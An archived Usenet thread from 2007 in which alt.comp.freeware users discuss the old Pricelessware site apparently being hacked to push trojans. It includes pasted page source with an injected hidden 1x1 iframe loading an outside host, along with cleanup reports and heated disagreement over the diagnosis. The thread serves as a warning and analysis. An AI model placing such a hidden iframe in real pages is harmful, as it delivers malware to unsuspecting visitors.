Gmail Calendar Documents Reader Web more »
Recently Visited Groups | Help | Sign in
Google Groups Home
Ping Susan -Pricelessware site
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  Messages 1 - 25 of 68 - Collapse all  -  Translate all to Translated (View all originals)   Newer >
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
Mahatma Kote  
View profile  
 More options Oct 29 2007, 8:00 pm
Newsgroups: alt.comp.freeware
From: dingdongda...@dumas.com (Mahatma Kote)
Date: Tue, 30 Oct 2007 00:00:50 GMT
Local: Mon, Oct 29 2007 8:00 pm
Subject: Ping Susan -Pricelessware site
What's happened ? - can't get in.
--
Happy as a fat rat in a cheese factory

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mike Easter  
View profile  
 More options Oct 29 2007, 8:14 pm
Newsgroups: alt.comp.freeware
From: "Mike Easter" <Mi...@ster.invalid>
Date: Mon, 29 Oct 2007 17:14:53 -0700
Local: Mon, Oct 29 2007 8:14 pm
Subject: Re: Ping Susan -Pricelessware site

Mahatma Kote wrote:
> What's happened ? - can't get in.

http://www.pricelesswarehome.org/ works OK for me

http://www.pricelessware.org/  gives me a lot of virus alerts.

--
Mike Easter


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Bear Bottoms  
View profile  
 More options Oct 29 2007, 8:38 pm
Newsgroups: alt.comp.freeware
From: "Bear Bottoms" <bearbotto...@gmai.com>
Date: Mon, 29 Oct 2007 19:38:29 -0500
Local: Mon, Oct 29 2007 8:38 pm
Subject: Re: Ping Susan -Pricelessware site

On Mon, 29 Oct 2007 19:14:53 -0500, Mike Easter <Mi...@ster.invalid> wrote:
> Mahatma Kote wrote:
>> What's happened ? - can't get in.

> http://www.pricelesswarehome.org/ works OK for me

> http://www.pricelessware.org/  gives me a lot of virus alerts.

I get nothing from the old site.

--
Bear Bottoms
Freeware website  http://bearbottoms1.com


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mahatma Kote  
View profile  
 More options Oct 29 2007, 8:58 pm
Newsgroups: alt.comp.freeware
From: dingdongda...@dumas.com (Mahatma Kote)
Date: Tue, 30 Oct 2007 00:58:24 GMT
Local: Mon, Oct 29 2007 8:58 pm
Subject: Re: Ping Susan -Pricelessware site
On Mon, 29 Oct 2007 17:14:53 -0700, "Mike Easter" <Mi...@ster.invalid>
wrote:

>Mahatma Kote wrote:
>> What's happened ? - can't get in.

>http://www.pricelesswarehome.org/ works OK for me

>http://www.pricelessware.org/  gives me a lot of virus alerts.

OK got it.  I still had http://www.pricelessware.org/ in bookmarks.

--
Happy as a fat rat in a cheese factory


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
John Corliss  
View profile  
 More options Oct 30 2007, 5:51 am
Newsgroups: alt.comp.freeware
From: John Corliss <jcorl...@fake.invalid>
Date: Tue, 30 Oct 2007 02:51:09 -0700
Local: Tues, Oct 30 2007 5:51 am
Subject: Re: Ping Susan -Pricelessware site

Mike Easter wrote:
> Mahatma Kote wrote:
>> What's happened ? - can't get in.

> http://www.pricelesswarehome.org/ works OK for me

> http://www.pricelessware.org/  gives me a lot of virus alerts.

Virus alerts? Mike, can you elaborate on that a little?

   http://www.siteadvisor.com/sites/pricelessware.org

--
John Corliss BS206. I try not to reply to trolls like Andy Mabbett,
Hummingbird or proteanthread.
    Because of Googlespam, I use NFilter to block all Google Groups
posts from being displayed in my news reader.
    No ad, cd, commercial, cripple, demo, dotnet, nag, share, spy,
time-limited, trial or web wares OR warez for me, please.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 8:43 am
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Tue, 30 Oct 2007 12:43:08 +0000
Local: Tues, Oct 30 2007 8:43 am
Subject: Re: Ping Susan -Pricelessware site

On Tue, 30 Oct 2007 05:55:24 -0500  'h...@hmmm.org'
wrote this on alt.comp.freeware:

>"Mike Easter" <Mi...@ster.invalid> wrote in
>news:13ictrnk3bsf0ea@corp.supernews.com:

>> http://www.pricelessware.org/  gives me a lot of virus alerts.

>What AV program are you using?  I just opened it and didn't get anything,
>and I've gone to that site using several of the top AV programs in the last
>year.  Adblock plus doesn't show any strange items and Siteadvisor.com
>gives it a clean rating./

>One thing I did notice this time is that even with javascript enabled, I
>couldn't get a menu on the pricelessware.org main page.  All I saw was the
>banner.

The pricelessware.org website is infect with this:
http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE...

See the warning thread I posted about it...

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 11:32 am
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Tue, 30 Oct 2007 15:32:53 +0000
Local: Tues, Oct 30 2007 11:32 am
Subject: Re: Ping Susan -Pricelessware site

On Tue, 30 Oct 2007 09:28:31 -0500  'h...@hmmm.org'
wrote this on alt.comp.freeware:

>hummingbird <hummingb...@2die4.com> wrote in
>news:8dd15d7fd9d9b66603b70fd729854154@localhost.127.0.0.1:

>> The pricelessware.org website is infect with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.h
>> tml

>> See the warning thread I posted about it.
>I didn't see anything on the Prevx page that mentioned pricelessware.org.
>I also tried a Google newsgroup search for your thread and couldn't find
>it.

The prevx page doesn't mention pricelessware.org ... it describes
the trojan that the website is infected with. I got that by googling
one of the .exe files which were downloaded from the
pricelessware.org site onto my computer.

Here's what I wrote in a new thread MID:
Message-ID: <b734e4829ce5892822ed78928c4b8080@localhost.127.0.0.1>

        <quote>

 -----WARNING-----WARNING-----

It appears the OLD Pricelessware website has been compromised
and infected with a trojan virus.

IF YOU SURF TO IT, IT WILL AUTO DOWNLOAD A BUNCH OF
TROJANS/VIRUS EXECUTABLEs AND MAY INFECT YOUR COMPUTER.

Details of the trojan virus and what it does are here:

        </quote>

HTH.

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Franklin  
View profile  
 More options Oct 30 2007, 12:48 pm
Newsgroups: alt.comp.freeware
From: Franklin <frank.s...@no.spam.com>
Date: Tue, 30 Oct 2007 16:48:48 GMT
Local: Tues, Oct 30 2007 12:48 pm
Subject: Re: Ping Susan -Pricelessware site
On Tue 30 Oct 2007 14:28:31,  <h...@hmmm.org> wrote:

> hummingbird <hummingb...@2die4.com> wrote in
> news:8dd15d7fd9d9b66603b70fd729854154@localhost.127.0.0.1:

>> The pricelessware.org website is infect with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.E
>> XE.h tml

>> See the warning thread I posted about it.

> I didn't see anything on the Prevx page that mentioned
> pricelessware.org. I also tried a Google newsgroup search for your
> thread and couldn't find it.

Your scans couldn't find anything.  

Maybe Hummingbird picked up the virus while visiting porn sites?


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
bluerhinoceros  
View profile  
 More options Oct 30 2007, 1:04 pm
Newsgroups: alt.comp.freeware
From: bluerhinoceros <bluerhinoce...@humanzoo.invalid>
Date: Tue, 30 Oct 2007 10:04:09 -0700
Local: Tues, Oct 30 2007 1:04 pm
Subject: Re: Ping Susan -Pricelessware site

Curiosity not being confined to cats, I had to have a go at it shortly
after HB first posted his alert. My scanner also blocked some Java
activity. I saw a reference to "gollum" go by, and a bunch of other
redirections, and some Java junk got trapped before I canned it.

After doing a full system cleanse, I put pricelessware.org into my
Untrusted Sites list and went back. Nothing happened then.

And I don't think it's got anything to do with pron sites, the only
horny babe I've been looking at recently is this one:

http://www.positivt.dk/images27/0060.jpg

Cheers.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Franklin  
View profile  
 More options Oct 30 2007, 1:13 pm
Newsgroups: alt.comp.freeware
From: Franklin <frank.s...@no.spam.com>
Date: Tue, 30 Oct 2007 17:13:42 GMT
Local: Tues, Oct 30 2007 1:13 pm
Subject: Re: Ping Susan -Pricelessware site
On Tue 30 Oct 2007 17:04:09, bluerhinoceros wrote:

Don't show that picture to Hummingbird!  It will only give him ideas.

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 1:24 pm
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Tue, 30 Oct 2007 17:24:24 +0000
Local: Tues, Oct 30 2007 1:24 pm
Subject: Re: Ping Susan -Pricelessware site

On Tue, 30 Oct 2007 10:04:09 -0700  'bluerhinoceros'
wrote this on alt.comp.freeware:

>Curiosity not being confined to cats, I had to have a go at it shortly
>after HB first posted his alert. My scanner also blocked some Java
>activity. I saw a reference to "gollum" go by, and a bunch of other
>redirections, and some Java junk got trapped before I canned it.

Wow! you're braver than me bluerhino! I only went there to check
if it was working after someone posted that it wasn't working.

>After doing a full system cleanse, I put pricelessware.org into my
>Untrusted Sites list and went back. Nothing happened then.

I've now put it in my hosts file...never again.

I must say I'm rather puzzled as to why anyone would select that
website to hack into and plant a complex trojan...hhmmm.

Anyway, I e-mailed the website hosters and reported it.

>And I don't think it's got anything to do with pron sites, the only
>horny babe I've been looking at recently is this one:

>http://www.positivt.dk/images27/0060.jpg

 :-)

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Susan Bugher  
View profile  
 More options Oct 30 2007, 2:03 pm
Newsgroups: alt.comp.freeware
From: Susan Bugher <sebug...@yahoo.com>
Date: Tue, 30 Oct 2007 14:03:54 -0400
Local: Tues, Oct 30 2007 2:03 pm
Subject: Re: Ping Susan -Pricelessware site

bluerhinoceros wrote:
> Curiosity not being confined to cats, I had to have a go at it shortly
> after HB first posted his alert. My scanner also blocked some Java
> activity. I saw a reference to "gollum" go by, and a bunch of other
> redirections, and some Java junk got trapped before I canned it.

> After doing a full system cleanse, I put pricelessware.org into my
> Untrusted Sites list and went back. Nothing happened then.

Also curious, I looked at the page source - copied below.

****************************************
<html><head><meta name="robots" content="index, follow"><meta
name="revisit" content="7 days"><link rel="shortcut icon"
href="favicon.ico"><meta http-equiv="content-type" content="text/html;
charset=UTF-8"><title>Pricelessware</title></head><body
bgcolor="#A3BEC9" text="#000000" link="#0000FF" vlink="#0000FF"
alink="#FF0000" marginheight="0" marginwidth="0" topmargin="0"
bottommargin="0" leftmargin="0" rightmargin="0"><table border="0"
cellpadding="0" width="100%" height="100%"><tr><td width="100%"
align="center" valign="middle"><table border="0" cellpadding="0"
width="400" bgcolor="#000000"><tr><td width="100%" bgcolor="#FFFFFF"
align="center" valign="top"><table border="0" width="100%" height="100%"
bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"><tr><td width="100%"
valign="top" align="left" bgcolor="#FFFFFF"> <br><center><font
face="Verdana,Arial" color="#000080"
SIZE="4">alt.comp.freeware</font><br><FONT face="Arial" COLOR="#000000"
SIZE="2"><b>Is proud to present to you...</b></font><br> <br><hr
width="300" size="1" noshade><font face="Verdana,Arial" color="#0963A0"
SIZE="5">The Pricelessware list!</font><hr width="300" size="1"
noshade> <br><font face="Verdana,Arial" SIZE="2"><b>[ <a
href="thelist/index.htm">E n t e r   H e r e</a>
]</b><br> <br></center></td></tr></table></td></tr></table></td></tr></table><iframe
src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230" width=1
height=1 frameborder=0>

</body></html>TH ALIGN=center BGCOLOR="#FFFF00"><FONT
SIZE="-1">Visits</FONT></TH>
<TH ALIGN=center BGCOLOR="#FF8000"><FONT SIZE="-1">Sites</FONT></TH>

<TH ALIGN=center BGCOLOR="#FF0000"><FONT SIZE="-1">KBytes</FONT></TH>
<TH ALIGN=center BGCOLOR="#FFFF00"><FONT SIZE="-1">Visits</FONT></TH>
<TH ALIGN=center BGCOLOR="#00E0FF"><FONT SIZE="-1">Pages</FONT></TH>
<TH ALIGN=center BGCOLOR="#0080FF"><FONT SIZE="-1">Files</FONT></TH>
<TH ALIGN=center BGCOLOR="#008040"><FONT SIZE="-1">Hits</FONT></TH></TR>
<TR><TH HEIGHT=4></TH></TR>
<TR><TD NOWRAP><A HREF="usage_200709.html"><FONT SIZE="-1">Sep
2007</FONT></A></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>

<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">1</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">587</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD></TR>
<TR><TH HEIGHT=4></TH></TR>

<TR><TH BGCOLOR="#C0C0C0" COLSPAN=6 ALIGN=left><FONT
SIZE="-1">Totals</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">587</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">0</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">0</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">2</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">2</FONT></TH></TR>
<TR><TH HEIGHT=4></TH></TR>
</TABLE>
</CENTER>
<P>
<HR>

<TABLE WIDTH="100%" CELLPADDING=0 CELLSPACING=0 BORDER=0>
<TR>
<TD ALIGN=left VALIGN=top>
<SMALL>Generated by
<A HREF="http://www.mrunix.net/webalizer/"><STRONG>Webalizer Version
2.01</STRONG></A>
</SMALL>
</TD>
</TR>
</TABLE>

<!-- Webalizer Version 2.01-10 (Mod: 16-Apr-2002) -->

</BODY>
</HTML>
<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
width=1 height=1 frameborder=0>

***************************

The original page and page source can be viewed via the Wayback Machine
(the WM adds some javascript to the source, ignore that part). See:
http://web.archive.org/web/*/http://www.pricelessware.org/

dunno what:

<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
width=1 height=1 frameborder=0>

does but I don't think it's good.

Susan
--
Posted to alt.comp.freeware
Search alt.comp.freeware (or read it online):
http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
Pricelessware & ACF: http://www.pricelesswarehome.org
Pricelessware: http://www.pricelessware.org (not maintained)


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 3:31 pm
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Tue, 30 Oct 2007 19:31:20 +0000
Local: Tues, Oct 30 2007 3:31 pm
Subject: Re: Ping Susan -Pricelessware site

On Tue, 30 Oct 2007 14:03:54 -0400  'Susan Bugher'
wrote this on alt.comp.freeware:

>Also curious, I looked at the page source - copied below.

[snip]

>dunno what:

><iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>width=1 height=1 frameborder=0>

>does but I don't think it's good.

That website is hosted in Malaysia it seems and is owned by a
registrant in Hong Kong, China:
http://www.dnsstuff.com/tools/whois.ch?ip=http://xstuff.biz/

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 3:51 pm
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Tue, 30 Oct 2007 19:51:02 +0000
Local: Tues, Oct 30 2007 3:51 pm
Subject: Re: Ping Susan -Pricelessware site

On Tue, 30 Oct 2007 14:03:54 -0400  'Susan Bugher'
wrote this on alt.comp.freeware:

>--
>Posted to alt.comp.freeware
>Search alt.comp.freeware (or read it online):
>http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
>Pricelessware & ACF: http://www.pricelesswarehome.org
>Pricelessware: http://www[dot]pricelessware[dot]org (not maintained)

Susan, do you think it's a good idea still to be advertising the
OLD pricelessware site in your signature, given that it's been
hacked and contains a trojan virus?

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
bluerhinoceros  
View profile  
 More options Oct 30 2007, 6:54 pm
Newsgroups: alt.comp.freeware
From: bluerhinoceros <bluerhinoce...@humanzoo.invalid>
Date: Tue, 30 Oct 2007 15:54:08 -0700
Local: Tues, Oct 30 2007 6:54 pm
Subject: Re: Ping Susan -Pricelessware site

Hi hmmm:

Go to the bottom of the page where it says "...can also use the
following file names".

Select them all (hold down the left mouse button and starting at the top
left of the first file name, go to the end of the last name). LEt up the
left button, right click the selection, select Copy.

Open Notepad, and paste in what you just copied. Make sure your cursor
is at the very beginning of the text and click Edit -> Replace. Replace
a single space with a comma followed by a space. Look for the string
"DOCUMENTS, AND, SETTIN" and remove the two commas from it, but surround
it with the double quotes so it looks exactly (quotes included) like

"DOCUMENTS AND SETTIN"

Select all text and right click -> Copy.

Open a command line. Change directories to the root of the drive,
typically C:\

Type "dir " (no quotes, but remember the space). Click the top left
black box icon in the title bar, move to Edit, select Paste.

If there's a trailing comma, bacspace over it, add a space and "/s" (no
quotes).

Hit enter.

You might also like to run it after adding " /a:h" and then " /a:s" at
the end of the command line, also. (No quotes, but a leading space)

If you get toms of hits, repeat the command but add ">> c:\found.jnk" at
the end of the line. When you're finished, c:\found.jnk will contain
reference to all the files found.

<gasp>

Hope this makes sense, and it works for you.

Cheers.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
bluerhinoceros  
View profile  
 More options Oct 30 2007, 6:59 pm
Newsgroups: alt.comp.freeware
From: bluerhinoceros <bluerhinoce...@humanzoo.invalid>
Date: Tue, 30 Oct 2007 15:59:45 -0700
Local: Tues, Oct 30 2007 6:59 pm
Subject: Re: Ping Susan -Pricelessware site

h...@hmmm.org wrote:
> bluerhinoceros <bluerhinoce...@humanzoo.invalid> wrote in
> news:13iep0d7qulo11c@news.supernews.com:

>> My scanner also blocked some Java
>> activity. I saw a reference to "gollum" go by, and a bunch of other
>> redirections, and some Java junk got trapped before I canned it.

>> After doing a full system cleanse, I put pricelessware.org into my
>> Untrusted Sites list and went back. Nothing happened then.

> What scanner and "cleanser" did you use?  This internet is becoming so germ
> filled that they're have to start injecting Comet Cleanser and Lysol into
> the security programs soon.

Hi hmmm:

I'm using Avira Antivir Personal Edition Classic. I also use Prevx 2.0,
but it didn't notice anything, presumably because AntiVir was earlier in
the food chain.

I then used Avira to scan the whole drive, followed by a reboot, another
sweep and a going over with Prevx, Spybot and AdAware for good measure.

I have Returnil installed, and had I thought about it, I'd have turned
on sandbox mode before going to a known nasty site, but it was late and
I was tired...  :-)

Cheers.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Lew/+Silat  
View profile  
 More options Oct 30 2007, 7:11 pm
Newsgroups: alt.comp.freeware
From: "Lew/+Silat" <Drafted1970number54S...@Invalid.com>
Date: Tue, 30 Oct 2007 16:11:55 -0700
Local: Tues, Oct 30 2007 7:11 pm
Subject: Re: Ping Susan -Pricelessware site

<h...@hmmm.org> wrote in message news:wbKdndRP-Pt9AbranZ2dnUVZ_vninZ2d@giganews.com...
> bluerhinoceros <bluerhinoce...@humanzoo.invalid> wrote in
> news:13iep0d7qulo11c@news.supernews.com:

>> My scanner also blocked some Java
>> activity. I saw a reference to "gollum" go by, and a bunch of other
>> redirections, and some Java junk got trapped before I canned it.

>> After doing a full system cleanse, I put pricelessware.org into my
>> Untrusted Sites list and went back. Nothing happened then.

> What scanner and "cleanser" did you use?  This internet is becoming so germ
> filled that they're have to start injecting Comet Cleanser and Lysol into
> the security programs soon.

If you surf using the free "Returnil" or "sandboxie" none of this would bother your machine:)

--
                   Lew/+Silat


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 7:33 pm
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Tue, 30 Oct 2007 23:33:37 +0000
Local: Tues, Oct 30 2007 7:33 pm
Subject: Re: Ping Susan -Pricelessware site

On Tue, 30 Oct 2007 16:02:12 -0500  'h...@hmmm.org'
wrote this on alt.comp.freeware:

>hummingbird <hummingb...@2die4.com> wrote in
>news:08381e20fde3bbc37a39a4a55bddb58d@localhost.127.0.0.1:

>> Details of the trojan virus and what it does are here:
>>>http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.h
>>>tml

>What's the easiest way to copy all of the files listed on the Prevx url
>into the search for files and folders, so that I can search for all of the
>files listed in one try.   I seem to remember that a semicolon or some
>other punctuation mark.

Do you mean do a search on your local machine?

If so, I dunno because I use my payware file manager and it listed
the bad files in about 5 secs because I have files sorted by date in
descending order, so the trojan .exe files all appeared at the top
of the list and I immediately saw them there. That allowed me to
rename them all, reboot and search for other items like the reg key
it created and then run a few av apps.

Notably, Spybot S&D found nothing even with the latest updates
running and AdAware only found the bad reg key.

I guess it took me about 1 hour and three reboots to recover.
No damage done. I caught it in good time.

Today, I put all the bad files through jotti but only about 40%
of their virus scans found the trojans in them, notably Kaspersky
and F-whatsit.  I am not impressed :-(

>Shouldn't this kind of info about Pricelessware.org be discussed on
>Wilders?   What good is Siteadvisor if they don't have an alert.  Is there
>anyone at McAfee who evens monitors that tool?

Dunno, I posted the alert to warn other ACF-ers and possibly that
someone might know how to deal with it. I also sent urgent e-mail
to the website hoster today - so far no response. It needs taking
down and fixing pronto.

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Anonymous Sender  
View profile  
 More options Oct 30 2007, 8:48 pm
Newsgroups: alt.comp.freeware
From: Anonymous Sender <anonym...@remailer.metacolo.com>
Date: Wed, 31 Oct 2007 00:48:54 +0000 (UTC)
Local: Tues, Oct 30 2007 8:48 pm
Subject: Re: Ping Susan -Pricelessware site

No, it's not. It links to about a hundres other sites behind your back
and one of them may or may not try to send you that file (I saw no such
thing in a full packet capture), but it's not "infected" with anything.

> See the warning thread I posted about it...

Innacurate warnings from people who don't know what they're talking
about are as useless as no warnings at all. Next time you run up
against something you don't understand, please don't just guess. Ask
politely and an expert will explain it to you.

HTH.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 9:18 pm
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Wed, 31 Oct 2007 01:18:18 +0000
Local: Tues, Oct 30 2007 9:18 pm
Subject: Re: Ping Susan -Pricelessware site

On Wed, 31 Oct 2007 00:48:54 +0000 (UTC)  'Anonymous Sender'
wrote this on alt.comp.freeware:

Yes it is. I got caught with it last night.
I Googled some of the files and that's what it came up with.

And your next trick.............. is..............?

>It links to about a hundres other sites behind your back
>and one of them may or may not try to send you that file (I saw no such
>thing in a full packet capture), but it's not "infected" with anything.

Wrong. Do try to keep up at the back.

If you read elsewhere in this thread, you will see that someone
grabbed a raw copy of the front page from the pl.org site and it
contains a website address (unrelated to pricelessware.org) which is
hosted in Malaysia. That is probably where users are having the
trojan files downloaded from without knowing. So there appears to
be only one redirection but I'm not too fussed about it. That is
consistent with what happened to my ISP 6 months ago when Russian
criminals hacked into their webmail service and diverted users to
*their* website address to download trojans.

>> See the warning thread I posted about it...

>Innacurate warnings from people who don't know what they're talking
>about are as useless as no warnings at all. Next time you run up
>against something you don't understand, please don't just guess. Ask
>politely and an expert will explain it to you.

It won't be you then, will it.

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
hummingbird  
View profile  
 More options Oct 30 2007, 9:22 pm
Newsgroups: alt.comp.freeware
From: hummingbird <hummingb...@2die4.com>
Date: Wed, 31 Oct 2007 01:22:11 +0000
Local: Tues, Oct 30 2007 9:22 pm
Subject: Re: Ping Susan -Pricelessware site

On Tue, 30 Oct 2007 15:59:45 -0700  'bluerhinoceros'
wrote this on alt.comp.freeware:

>Hi hmmm:

>I'm using Avira Antivir Personal Edition Classic. I also use Prevx 2.0,
>but it didn't notice anything, presumably because AntiVir was earlier in
>the food chain.

>I then used Avira to scan the whole drive, followed by a reboot, another
>sweep and a going over with Prevx, Spybot and AdAware for good measure.

See my comments about Spybot and AdAware. Neither picked up the
trojan files on my HDD.

>I have Returnil installed, and had I thought about it, I'd have turned
>on sandbox mode before going to a known nasty site, but it was late and
>I was tired...  :-)

Stop chasing rhinos ;-)

--
uh oh...black helicopter ... gotta run


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Susan Bugher  
View profile  
 More options Oct 31 2007, 12:37 am
Newsgroups: alt.comp.freeware
From: Susan Bugher <sebug...@yahoo.com>
Date: Wed, 31 Oct 2007 00:37:27 -0400
Local: Wed, Oct 31 2007 12:37 am
Subject: Re: Ping Susan -Pricelessware site

Susan Bugher wrote:
> bluerhinoceros wrote:
>> Curiosity not being confined to cats, I had to have a go at it shortly
>> after HB first posted his alert. My scanner also blocked some Java
>> activity. I saw a reference to "gollum" go by, and a bunch of other
>> redirections, and some Java junk got trapped before I canned it.

>> After doing a full system cleanse, I put pricelessware.org into my
>> Untrusted Sites list and went back. Nothing happened then.
> Also curious, I looked at the page source - copied below.

<SNIP>

Sometimes paranoid, I went to the web page Hummingbird posted:
http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE...
where they recommended I scan my computer with:
Prevx Computer Security Investigator (CSI)
http://pxnow.prevx.com/zeroL/PREVXCSIFREE.EXE
1523 KB

so I did. . .   the results:

<q>
Security Product        AVG 7.5.485 Version 7.5.485
Windows Windows XP Home Service Pack 2 (Build 2600) 32bit
Scans   1   (First Scan: Oct 31 4:13 UCT   Last Scan: Oct 31 4:17 UCT)
Files Checked   2,780
Bad Files       0
Your Computer Status    CLEAN
</q>

> dunno what:

> <iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
> width=1 height=1 frameborder=0>

> does but I don't think it's good.

still dunno what that link does. . .

Susan
--
Posted to alt.comp.freeware
Search alt.comp.freeware (or read it online):
http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
Pricelessware & ACF: http://www.pricelesswarehome.org
Pricelessware: http://www.pricelessware.org (not maintained)


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Nomen Nescio  
View profile  
 More options Oct 31 2007, 1:41 am
Newsgroups: alt.comp.freeware
From: Nomen Nescio <nob...@dizum.com>
Date: Wed, 31 Oct 2007 06:41:24 +0100 (CET)
Local: Wed, Oct 31 2007 1:41 am
Subject: Re: Ping Susan -Pricelessware site

Yes, dimbulb, that's exactly what I said.

And the site isn't infected with anything, even if it does try to drop
files. You apparently don't even understand the basic lexicography, let
alone the problem in any depth.

> That is probably where users are having the
> trojan files downloaded from without knowing. So there appears to
> be only one redirection but I'm not too fussed about it. That is

More like 60. I counted 66 to be exact, and snaked them all. There's a
whole lot more to be concerned with than amateurish .exe link exploits
on that page. So whoever "grabbed the front page" needs to learn a
little bit more about what they're doing too.

> consistent with what happened to my ISP 6 months ago when Russian
> criminals hacked into their webmail service and diverted users to
> *their* website address to download trojans.

That's UPload. And sites offering trojans for download aren't
"infected" no matter where they are or how many they offer.

> >> See the warning thread I posted about it...

> >Innacurate warnings from people who don't know what they're talking
> >about are as useless as no warnings at all. Next time you run up
> >against something you don't understand, please don't just guess. Ask
> >politely and an expert will explain it to you.

> It won't be you then, will it.

Seems to be working well so far this time. If you weren't so thick this
conversation would already be over. But I have to keep correcting you
and going over the same material. :(


    Reply to author    Forward  
You must Sign in before you can post messages.
